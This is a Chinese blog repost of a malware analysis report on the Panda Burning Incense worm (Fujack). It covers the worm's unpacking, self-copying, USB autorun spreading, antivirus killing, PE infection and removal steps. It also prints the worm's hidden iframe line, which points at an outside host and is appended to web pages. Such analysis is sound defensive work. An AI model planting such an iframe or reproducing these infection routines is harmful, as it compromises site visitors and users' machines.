病毒分析报告-熊猫烧香

最新推荐文章于 2021-10-14 20:26:00 发布
最新推荐文章于 2021-10-14 20:26:00 发布
阅读量818 收藏 3
点赞数
文章标签: 操作系统 php
原文链接:http://www.cnblogs.com/Unconscious/p/9112120.html
版权

 

 

 

 

 

 

 

 

分析报告

 

 

 

 

 

 

 

样本名

Worm.Win32.Fujack.p

时间

2017-5-27

平台

Windows 10

 

 

 

病毒分析报告

目录

1.样本概况    3

1.1 样本信息    3

1.2 测试环境及工具    3

1.3 分析目标    3

2.具体行为分析    3

2.1 主要行为    3

2.1.1 恶意程序对用户造成的危害(图)     5

2.2 恶意代码分析    5

2.1 恶意代码的加固方式和脱壳    5

2.2 恶意程序的代码分析片段    6

3.解决方案    7

3.1 提取病毒的特征,利用杀毒软件查杀    7

3.2 手工查杀步骤或是工具查杀步骤或是查杀思路等。    13

 

 

1.样本概况

1.1 样本信息

病毒名称:Worm.Win32.Fujack.p

MD5值:512301c535c88255c9a252fdf70b7a03

SHA1值:ca3a1070cff311c0ba40ab60a8fe3266cfefe870

CRC32: E334747C

编写语言:Delphi

加固:FSG v2.0

病毒行为:复制自身、感染PE文件、覆写PE文件、修改注册表自启动、枚举进程并关闭杀软进程、删除安全软件启动项、创建U盘自启动文件、网络的访问

1.2 测试环境及工具

环境:Win7

工具:火绒剑、OD、IDA

1.3 分析目标

分析病毒的恶意行为,提取特征码

2.具体行为分析

2.1 主要行为

病毒的主要行为分三个部分:

自我复制:

 

自我保护:

 

感染:

文件感染:

网络感染:

利用139或者445端口

2.1.1 恶意程序对用户造成的危害(图)

(1)复制病毒自身到系统目录下,名为spcolsv.exe

(2)每个目录下都生成Desktop_.ini(记录日期)文件

  1. 感染固定后缀名文件
  2. 将病毒设为开机自启动
  3. 盘符根目录下生成setup.exe与autorun.inf,用于U盘自启动

2.2 恶意代码分析

2.1 恶意代码的加固方式和脱壳

(1)加固方式:

使用PEiD查壳,发现时FSGv2.0版本的壳

 

 

 

 

 

 

  1. 脱壳

使用单步跟踪法,留意远跳

 

 

修复IAT表的结尾,使用ImpREC修复导入表

2.2 恶意程序的代码分析片段

2.2.1 病毒主要逻辑

 

 

2.2.2 判断字符串是否被修改

2.2.3 恶意代码的自我复制

将 C:\WINDOWS\system32\drivers\spo0lsv.exe 转为大写后, 和自身路径对比

 

如果不C:\WINDOWS\system32\driver\处运行, 则将自身复制到路径C:\WINDOWS\system32\drivers\

 

运行 C:\WINDOWS\system32\drivers\spo0lsv.exe, 并结束本进程

2.2.3 创建U盘启动项的定时器回调函数

(1) 判断是否需要释放文件

 

(2) 遍历磁盘, 将自身复制到 盘符:\setup.exe

 

(3) 遍历磁盘, 创建 盘符:\autorun.inf 文件

 

(4)设置setup.exe 文件属性为, <系统,隐藏>

 

(5)设置autorun.inf 文件属性为, <系统,隐藏>

 

2.2.4 遍历关安全软件和谐开机启动项的定时器回调函数

遍历窗口名,发送quit消息

 

修改注册表,添加启动项

 

2.2.5 更新的定时器回调函数

通过 "http://www.ac86.cn/66/up.txt" 更新, 网址已经失效

 

2.2.6 利用cmd命令关闭共享的定时器回调函数

 

2.2.7 针对安全软件启动项和服务的定时器回调函数

修改启动项

关停服务

 

2.2.8 获取网站源码的定时器回调函数

 

2.2.9 感染线程分析

获取所有磁盘名

 

遍历磁盘_感染目标

 

EXE, SRC, PIF, COM文件感染

 

 

(5) html, asp, php, jsp, aspx 文件的尾部加上 <iframe src=http://www.ac86.cn/66/index.htm width="0" height="0"></iframe>.

 

 

2.2.10 具体感染函数分析

读入目标文件

 

从将要感染程序中查找 "WhBoy", 找到则说明已经被感染了

 

将目标程序追加到病毒后面

 

感染后的标志为 "WhBoy" + 被感染程序名 + ".exe"

 

2.2.11 被感染后的程序的运行

判断是否被感染,是则跳转

 

创建文件名 + ".exe"的文件

 

从自身中提取原程序并写到新创建的文件中

 

 

在Temp目录写批处理,并运行批处理来启动原程序

3.解决方案

3.1 提取病毒的特征,利用杀毒软件查杀

特征包括:

http://wangma.9966.org/down.txt

"whboy"

 

3.2 专杀工具思路

1、删除系统目录C:\Windows\System32\drivers\spcolsv.exe文件

2、删除注册表HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVer

sion\Run键项的svcshare

3、删除每个盘符根目录下生成两个文件autorun.inf和setup.exe文件

4、设置注册表HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer

\Advanced\Folder\Hidden\SHOWALL,CheckedValue的键值设置为1(显示隐藏文件)

 

转载于:https://www.cnblogs.com/Unconscious/p/9112120.html

weixin_30316097
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[病毒分析]WannaCry病毒分析(永恒之蓝)
anhui8496的博客
05-28 2026
1.样本概况 1.1样本信息 病毒名称:Trojan-Ransom.Win32.Wanna.m 所属家族:木马/勒索/蠕虫 MD5: DB349B97C37D22F5EA1D1841E3C89EB4 SHA1: E889544AFF85FFAF8B0D0DA705105DEE7C97FE26 CRC32: 9FBB1227 1.2测试环境及工具 ...
工程伦理案例分析-熊猫烧香”案例分析
最新发布
01-18
【工程伦理案例分析——“熊猫烧香”】 “熊猫烧香”事件是中国互联网历史上的一次重大安全事件,它揭示了软件开发伦理的重要性。这个案例涉及到的伦理问题主要包括:技术滥用、责任承担、信息安全和道德责任。 1....
勒索病毒分析报告
qq_43572067的博客
11-01 3726
样本信息 病毒名称:勒索病毒 所属家族:恶意勒索 MD5值:DBD5BEDE15DE51F6E5718B2CA470FC3F SHA1值:863F5956863D793298D92610377B705F85FA42B5 CRC32:1386DD7A 病毒行为: 将自身拷贝到C:\Users\15pb-win7\Documents\,并将其设置注册表启动项。 设置为cmd命令行方式启动自身 运行过程...
Mydoom病毒分析报告
Hk_Mayfly的博客
10-14 1051
文件检测 信息 值 文件名 1.virus 文件类型 WIN 32 EXE 文件大小 41664 bytes MD5 3d466b0f8ba9f3fe03e137a34d79f682 SHA-256 7c4d73c8c9e394a72cc0eeda7e3ce78340a23f40cb3f682c06715e948c09feca 加壳 upx 2.90 导...
熊猫烧香病毒分析报告
CMC_HHM的博客
07-27 9671
1.样本概况 1.1 样本信息 (1)病毒名称:spo0lsv.exe (2)所属家族:熊猫烧香 (3)MD5值:B8F8E75C9E77743A61BBEA9CCBCFFD5D (4)SHA1值:188FC8FC580C0EA4BF8A8900A3D36471823C8923 (5)CRC32:E63D45D3 (6)病毒行为: 复制自身到系统目录下 设置文件属性为隐藏,并且让...
[病毒分析]熊猫烧香(上)初始分析
网络安全知识分享
03-03 1万+
熊猫烧香病毒分析(第一篇)一、病毒初始化二、PEID加壳检查三、IDA和OD的分析(1)使用IDA载入病毒样本(2)定位到0x0040CB7E位置(3)sub_403C98函数分析(4)打开IDA进入sub_403C98函数(5)sub_405360函数分析(6)sub_404018函数分析(7)loc_40CBBC功能分析四、总结 熊猫烧香样本下载 提取码:8189 一、病毒初始化 1、工具准备 IDA、OD、PEID 2、基本流程: 利用查壳工具检查病毒是否带壳 利用OD动态分析病毒 利用IDA
熊猫烧香分析报告.pdf
05-06
小白学分析,找了一个比较经典和简单的病毒进行学习,将报告...“熊猫烧香”虽然是一个很老的病毒,并且里面的手段也比较简单,但是对于初学者像我这样的小白来说,还是挺适合练手的,毕竟也是一个名气很大的传统病毒
计算机熊猫烧香病毒分析
05-09
计算机病毒是一些特殊的程序,它们能破坏计算机内、外存储器中的程序与数据,使计算机不能正常运行。这类程序还能自动修改磁盘里...如果不是地震引发海底光缆故障,那只颔首敬香的“熊猫”,还将“迁徙”到更远的地方。
云守护版熊猫烧香病毒专杀工具演示
01-11
1. 病毒库构建:首先,开发者需要收集和分析熊猫烧香病毒及其变种的特征,创建病毒库。 2. 扫描引擎设计:开发扫描引擎,通过比较文件特征与病毒库,检测是否存在病毒感染。 3. 文件修复机制:一旦发现病毒,工具需...
熊猫烧香案件的分析鉴定
05-09
计算机取证,熊猫烧香病毒的相关东东哦,看了还不错,分享一下啊
Svchosts病毒分析报告
王二娃的生活的博客
10-19 1314
基本信息 报告名称: Svchosts病毒分析报告 作者: 晨雾 报告更新日期:2016-10-17 样本发现日期:2016-10-17 样本类型: 盗号木马 样本文件大小:75KB 样本文件MD5 校验值: 2ce214f1734e0247b7223a39dcc99f64 样本文件SHA1 校验值:23051d7a6dd19abd60d3b2143d
Android木马病毒com.schemedroid的分析报告
Fly20141201. 的专栏
08-03 6368
某安全公司移动病毒分析报告的面试题目,该病毒样本的代码量比较大,最大的分析障碍是该病毒样本的类名称和类方法名称以及类成员变量的名称被混淆为无法辨认的特殊字符,每个被分析的类中所有的字符串都被加密处理了并且每个类的加密算法还不是一样的,人肉还原出被加密的字符串是很不现实的,该样本大约有100多个类,需要处理的加密字符串的解密高达几千个之多,有兴趣和能拿到样本的同学可以挑战一下自己,暂不提供样本。经...
病毒木马查杀实战第018篇:病毒特征码查杀之基本原理
热门推荐
Gleam的专栏
04-20 2万+
前言 在本系列的导论中,我曾经在“病毒查杀方法”中简单讲解过特征码查杀这种方式。而我也在对于实际病毒的专杀工具编写中,使用过CRC32算法来对目标程序进行指纹匹配,从而进行病毒判定。一般来说,类似于MD5以及CRC32这样的算法,在病毒大规模爆发时是可以提高查杀效率的,但是传统的更为常用的方法是采用以静态分析文件的结构为主并结合动态分析的方法,通过反汇编来寻找病毒的内容代码段、入口点代
熊猫烧香分析报告
qq_43572067的博客
11-01 3532
熊猫烧香分析报告样本信息测试环境及工具主要行为恶意程序对用户造成的危害加固后的恶意代码提取病毒的特征,利用杀毒软件查杀手工查杀步骤或是工具查杀步骤或是查杀思路等C++查杀工具部分源码 样本信息 病毒名称:512301C535C88255C9A252FDF70B7A03 所属家族:蠕虫 MD5值:512301C535C88255C9A252FDF70B7A03 SHA1值:CA3A1070CFF31...
“Nimaya(熊猫烧香)”病毒分析报告
hijack-x's Blog
04-10 6310
熊猫烧香”采用Delphi编写  该病毒的主要行为:一.传播   1.本地磁盘感染病毒对系统中所有除了盘符为A,B的磁盘类型为DRIVE_REMOTE,DRIVE_FIXED的磁盘进行文件遍历感染注:不感染文件大小超过10485760字节以上的.(病毒将不感染如下目录的文件):Microsoft FrontpageMovie MakerMSN Gamin ZoneCommon FilesWi
病毒木马查杀实战第005篇:熊猫烧香之逆向分析(上)
Gleam的专栏
11-17 8661
一、前言         对病毒进行逆向分析,可以彻底弄清楚病毒的行为,从而采取更有效的针对手段。为了节省篇幅,在这里我不打算将“熊猫烧香”进行彻底的分析,只会讲解一些比较重要的部分,大家只要掌握了这些思想,那么就可以处理很多的恶意程序了。一般来说,对病毒的静态分析,我们采用的工具是IDA Pro,动态分析则采用OllyDbg。由于后者会使病毒实际运行起来,所以为了安全起见,最好在虚拟机中操作。
病毒分析第一讲,分析病毒注意事项,以及简单分析主要功能
weixin_30593443的博客
11-23 154
        病毒分析第一讲,分析病毒注意事项,以及简单分析主要功能 一丶认识木马和病毒的区别 木马和病毒是两个不一样的,有人会把木马认为是病毒,但其实不是 说下区别 木马:   木马没有破坏性,木马主要功能是收集用户信息,控制机器等等. 病毒:   病毒一般带有破坏性的行为,比如格式化盘符,修改电脑的文件,传染.... 二丶分析病毒的前提准备 1.在分析病毒样本之...
流行病毒分析及防御文件.pdf
02-28
流行病毒分析及防御文件.pdf

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值